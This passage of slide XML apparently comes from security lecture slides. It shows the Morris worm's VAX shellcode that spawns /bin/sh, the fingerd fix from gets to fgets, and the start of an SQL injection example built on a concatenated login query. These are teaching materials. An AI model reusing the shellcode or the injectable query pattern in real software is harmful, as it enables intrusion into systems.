            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>target system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2300" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="2300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83972" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="6092825"/>
            <a:ext cx="4440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400" dirty="0"/>
              <a:t>Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0"/>
              <a:t>http://computervirus.uw.hu/ch10lev1sec4.html</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10</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" alt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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Morris worm – the shell code</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86020" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="107950" y="1916113"/>
            <a:ext cx="89090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b="1" dirty="0"/>
              <a:t>VAX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" b="1" dirty="0" err="1"/>
              <a:t>Opcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" b="1" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" b="1" dirty="0" err="1"/>
              <a:t>Assembly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" b="1" dirty="0"/>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" b="1" dirty="0"/>
              <a:t>Comment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>DD8F2F736800      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>    $68732f       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>; '/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>\0'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>DD8F2F62696E      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>    $6e69622f     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>; '/bin'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>D05E5A            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>sp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>, r10       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>save</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> pointer to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>command</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>DD00             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>    $0            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>third</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>parameter</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>DD00              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>    $0            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>; second </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>parameter</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>DD5A              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>    r10           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> '/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>\0'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>DD03              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>    $3            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>arguments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>chmk</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>D05E5C            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>sp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>ap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>; Argument Pointer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>register</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>                                         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>; = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>BC3B              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>chmk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>     $3b           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>change</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>-mode-to-kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>This</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>", 0, 0) system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>execute a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>shell.</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11</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" alt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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Fingerd fix</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84995" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Fix was easy</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84996" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2771775" y="4149725"/>
            <a:ext cx="30384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dirty="0" err="1"/>
              <a:t>fgets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>line,sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>(line),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>stdin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>); </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84997" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3635375" y="2781300"/>
            <a:ext cx="11969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a:t>gets(line);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84998" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="592138" y="4960938"/>
            <a:ext cx="7343775"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dirty="0" err="1"/>
              <a:t>fgets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>() reads in at most one less than size characters from stream  and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>stores  them  into  the buffer pointed to by s.  Reading stops after an</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>EOF or a newline.  If a newline is read, it is stored into the  buffer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>A '\0' is stored after the last character in the buffer.</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84999" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4068763" y="3284538"/>
            <a:ext cx="431800" cy="792162"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 4586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12</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" alt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altLang="cs-CZ"/>
              <a:t>SQL injection</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51203" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>unsanitised</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t> input to form an SQL query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Example: Login form</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="51204" name="Picture 4" descr="php-login-for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3213100"/>
            <a:ext cx="2663825" cy="2292350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51205" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3635375" y="2852738"/>
            <a:ext cx="5111750" cy="36718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dirty="0" err="1"/>
              <a:t>statement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> = "SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>" + user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>ame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> + "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t> AND password= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t> + password + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>';</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>username: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>zriha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>, password: secret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>SQL statement: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
